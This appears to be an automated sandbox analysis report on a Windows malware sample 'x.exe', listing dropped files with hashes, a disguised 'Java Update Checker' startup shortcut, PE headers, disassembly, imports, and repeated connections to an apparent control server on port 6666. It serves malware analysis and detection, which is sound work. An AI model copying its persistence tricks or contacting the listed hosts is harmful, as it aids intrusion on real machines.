                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7547069718854624
                                      Encrypted:false
                                      SSDEEP:96:4uIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:tIFFmCGpL1GpLV
                                      MD5:817934726381A30B4B0143F5149A1FFD
                                      SHA1:7D7F4060E000D2846213C359212F3AC08E44F32E
                                      SHA-256:94DFB79406D62BA5B71F5EE5C0334D990D5B8CA7D0BDB774E0DF9431E84CF351
                                      SHA-512:A82B305594454C7A0B9E9AC9C97B90E686D9BE8588E0C4DEC8DFCFC2366ABB269767327D71A7FC08F1CCB346B4095D36F79DC871640A1F186285CD7A54EE93BC
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;....s".D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d1208.TMP (copy)

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d1525.TMP (copy)

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d1738.TMP (copy)

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 2 04:56:40 2024, mtime=Tue Jul 2 04:56:40 2024, atime=Tue Jul 2 04:56:40 2024, length=46592, window=hide
                                      Category:dropped
                                      Size (bytes):770
                                      Entropy (8bit):4.618198858120905
                                      Encrypted:false
                                      SSDEEP:12:8ZEEgA0c3SyTke1JPDIjDujAKblgCHGbwjDE0p4pzBmV:8vtky5DIjeAKZ+wjI0p4ptm
                                      MD5:6737E3BA0A7BC2A62CBFFC04C98891A6
                                      SHA1:5D55CB9C2AC6D69E3EFA89C140FDEE85BC43635D
                                      SHA-256:24863C06D9D61489CC22B18F123AA19663673FE1A79D09BB30C66EF18DCD418A
                                      SHA-512:1650F834C8878F94E79E27C5CF18B9BE2A33043C021D4F53EE7258E5B5A37D2F8FBE4651AA12C3A49F7EDD18B7FF78E65D74C90E34FEAD0FFBA8DEB05175EE66
                                      Malicious:false
                                      Preview:L..................F.... ......D.......D.......D................................P.O. .:i.....+00.../C:\...................`.1......Xz&. PROGRA~3..H......O.I.X./....g......................\+.P.r.o.g.r.a.m.D.a.t.a.......2......X./ JAVAUP~1.EXE..r.......X./.X./.............................J.a.v.a. .U.p.d.a.t.e. .C.h.e.c.k.e.r. .(.6.4. .b.i.t.)...e.x.e.......^...............-.......]...........{2.O.....C:\ProgramData\Java Update Checker (64 bit).exe..G.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.J.a.v.a. .U.p.d.a.t.e. .C.h.e.c.k.e.r. .(.6.4. .b.i.t.)...e.x.e.`.......X.......965543...........hT..CrF.f4... ..B.78...,......hT..CrF.f4... ..B.78...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                      C:\Windows\directx.sys

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):59
                                      Entropy (8bit):4.539234152262855
                                      Encrypted:false
                                      SSDEEP:3:oXeqNjMJJLNov:oXe2jInov
                                      MD5:9E06CBAEA528ED37C8D88CB88A27A9FF
                                      SHA1:8C6863473EDBBE39D692EDE22A57D09076BD40E1
                                      SHA-256:FB23916EF2EF95CABF567D35D79DE3209BD357967BBE1AAC618B684D06F4AD36
                                      SHA-512:B9EA6E2EF1E35BE7EE1E2782452FF4419787792299B30CFD7ADF9B37DC6D92D3E6EC36040E6320822E405C7FAFE7F79D05975B8430AF113041D1726A9BF90754
                                      Malicious:true
                                      Preview:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe..

                                      C:\Windows\svchost.com

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):41472
                                      Entropy (8bit):6.5046936264369135
                                      Encrypted:false
                                      SSDEEP:768:nyxqjQl/EMQt4Oei7RwsHxKANM0nDhlzOQdJM/:yxqjQ+P04wsZLnDrCn
                                      MD5:E2758E90753E604AB1857653E10B35EE
                                      SHA1:AB11564078B3A7D76FE3AC44F5EBB7A2BA3FF4E9
                                      SHA-256:F3A3B70915119FC44B3D3DFF93B367BE371C28D295A470773AC00266220D713E
                                      SHA-512:B35E860473CEC76FCC823031C2752E30ABD86CAFF433CB704DCC5947C6A5B83BAEA77FDD55485AC09ADADDCC878783444AB87EC734A3C9ACF9E10925E690B18D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.451047352584057
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.29%
                                      • Win32 Executable (generic) a (10002005/4) 49.25%
                                      • Win32 Executable Borland Delphi 6 (262906/60) 1.29%
                                      • Win32 Executable Delphi generic (14689/80) 0.07%
                                      • Windows Screen Saver (13104/52) 0.06%
                                      File name:x.exe
                                      File size:88'064 bytes
                                      MD5:d27e7c560c09eb318c80cab58baea1b2
                                      SHA1:354342a3b26579d2eb2a0db253ca6505629b3a48
                                      SHA256:6df33c856858c03f62d5a67a7bc69499db91a1405e67b83907dcabfe9bd31d40
                                      SHA512:003ae9783ef7cbca502a907aacf3df63424559a02d9ba4ddde03bd863104970139ef119438f16c6f54a73d81867de1ccace64474e9c4d387dd4694d689815833
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCngEin8r8ItiOeW894Fc9UW68OM3V:zr8WDrCngEus8ItiO094Fc9UUOMF
                                      TLSH:D983AE05B7C08432D1BD0FFD2D239295827AB5332E17DBAF59E84DCA6A6E3C08D08795
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                      File Icon

                                      Icon Hash:c4f4f2f29090f0e4

                                      Static PE Info

                                      General

                                      Entrypoint:0x408178
                                      Entrypoint Section:CODE
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:9f4693fc0c511135129493f2161d1e86

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFE0h
                                      xor eax, eax
                                      mov dword ptr [ebp-20h], eax
                                      mov dword ptr [ebp-18h], eax
                                      mov dword ptr [ebp-1Ch], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004080E8h
                                      call 00007F5EA4ED91E3h
                                      xor eax, eax
                                      push ebp
                                      push 004082B4h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      mov eax, 004091A8h
                                      mov ecx, 0000000Bh
                                      mov edx, 0000000Bh
                                      call 00007F5EA4EDC37Dh
                                      mov eax, 004091B4h
                                      mov ecx, 00000009h
                                      mov edx, 00000009h
                                      call 00007F5EA4EDC369h
                                      mov eax, 004091C0h
                                      mov ecx, 00000003h
                                      mov edx, 00000003h
                                      call 00007F5EA4EDC355h
                                      mov eax, 004091DCh
                                      mov ecx, 00000003h
                                      mov edx, 00000003h
                                      call 00007F5EA4EDC341h
                                      mov eax, dword ptr [00409210h]
                                      mov ecx, 0000000Bh
                                      mov edx, 0000000Bh
                                      call 00007F5EA4EDC32Dh
                                      call 00007F5EA4EDC384h
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007F5EA4ED9C1Eh
                                      mov eax, dword ptr [ebp-14h]
                                      call 00007F5EA4EDA1B2h
                                      cmp eax, 0000A200h
                                      jle 00007F5EA4EDD467h
                                      call 00007F5EA4EDC902h
                                      call 00007F5EA4EDD159h
                                      mov eax, 004091C4h
                                      mov ecx, 00000003h
                                      mov edx, 00000003h

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x150000x864.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1400.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x5cc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x170000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      CODE0x10000x72c00x740057df3a5615ac3f00c33b7f1f6f46d36aFalse0.6197804418103449data6.521149320889011IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      DATA0x90000x2180x4007ffc3168a7f3103634abdf3a768ed128False0.3623046875data3.1516983405583385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      BSS0xa0000xa8990x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0x150000x8640xa006e7a45521bfca94f1e506361f70e7261False0.37421875data4.173859768945439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .tls0x160000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0x170000x180x2007e6c0f4f4435abc870eb550d5072bad6False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                      .reloc0x180000x5cc0x6002f4536f51417a33d5e7cc1d66b1ca51eFalse0.8333333333333334data6.433117350337874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                      .rsrc0x190000x14000x1400d98354d7589200e2277640f411cb007cFalse0.5134765625data6.1058077759423535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x191500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4264RussianRussia0.5307223264540337
                                      RT_RCDATA0x1a1f80x10data1.5
                                      RT_RCDATA0x1a2080xacdata1.063953488372093
                                      RT_GROUP_ICON0x1a2b40x14dataRussianRussia1.1

                                      Imports

                                      DLLImport
                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                      user32.dllGetKeyboardType, MessageBoxA
                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                      oleaut32.dllSysFreeString, SysReAllocStringLen
                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                      advapi32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                      kernel32.dllWriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                      gdi32.dllStretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                      user32.dllReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                      shell32.dllShellExecuteA, ExtractIconA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      RussianRussia

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 2, 2024 06:52:01.926125050 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:52:01.931377888 CEST8049699208.95.112.1192.168.2.7
                                      Jul 2, 2024 06:52:01.931632996 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:52:01.932157040 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:52:01.937026024 CEST8049699208.95.112.1192.168.2.7
                                      Jul 2, 2024 06:52:02.407448053 CEST8049699208.95.112.1192.168.2.7
                                      Jul 2, 2024 06:52:02.449515104 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:53:13.309176922 CEST497056666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:13.317487955 CEST66664970545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:13.317569017 CEST497056666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:13.385483980 CEST497056666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:13.393064022 CEST66664970545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:15.485744953 CEST66664970545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:15.485927105 CEST497056666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:17.919755936 CEST8049699208.95.112.1192.168.2.7
                                      Jul 2, 2024 06:53:17.919929981 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:53:17.963959932 CEST497056666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:17.965264082 CEST497066666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:17.968801975 CEST66664970545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:17.970107079 CEST66664970645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:17.970208883 CEST497066666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:17.986192942 CEST497066666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:17.991170883 CEST66664970645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:20.207756042 CEST66664970645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:20.208240986 CEST497066666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:22.700336933 CEST497066666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:22.702291965 CEST497076666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:22.705257893 CEST66664970645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:22.707523108 CEST66664970745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:22.707611084 CEST497076666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:22.746671915 CEST497076666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:22.751804113 CEST66664970745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:24.860589981 CEST66664970745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:24.860672951 CEST497076666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:26.606139898 CEST497076666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:26.608102083 CEST497086666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:26.610897064 CEST66664970745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:26.612941027 CEST66664970845.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:26.613029003 CEST497086666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:26.630021095 CEST497086666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:26.634881973 CEST66664970845.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:28.785181046 CEST66664970845.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:28.785253048 CEST497086666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:30.831809044 CEST497086666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:30.833518982 CEST497096666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:30.836713076 CEST66664970845.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:30.838382006 CEST66664970945.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:30.838469028 CEST497096666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:30.855678082 CEST497096666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:30.860506058 CEST66664970945.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:33.021987915 CEST66664970945.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:33.022237062 CEST497096666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:35.824935913 CEST497096666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:35.825973988 CEST497106666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:35.829858065 CEST66664970945.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:35.830784082 CEST66664971045.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:35.830863953 CEST497106666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:35.846719027 CEST497106666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:35.851726055 CEST66664971045.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:38.027363062 CEST66664971045.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:38.027504921 CEST497106666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:40.840540886 CEST497106666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:40.841665983 CEST497116666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:40.846113920 CEST66664971045.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:40.846682072 CEST66664971145.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:40.846765041 CEST497116666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:40.862129927 CEST497116666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:40.866895914 CEST66664971145.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:42.420320988 CEST4969980192.168.2.7208.95.112.1
                                      Jul 2, 2024 06:53:42.425198078 CEST8049699208.95.112.1192.168.2.7
                                      Jul 2, 2024 06:53:43.020768881 CEST66664971145.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:43.020872116 CEST497116666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:44.903222084 CEST497116666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:44.904297113 CEST497126666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:44.908219099 CEST66664971145.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:44.909430981 CEST66664971245.141.26.232192.168.2.7
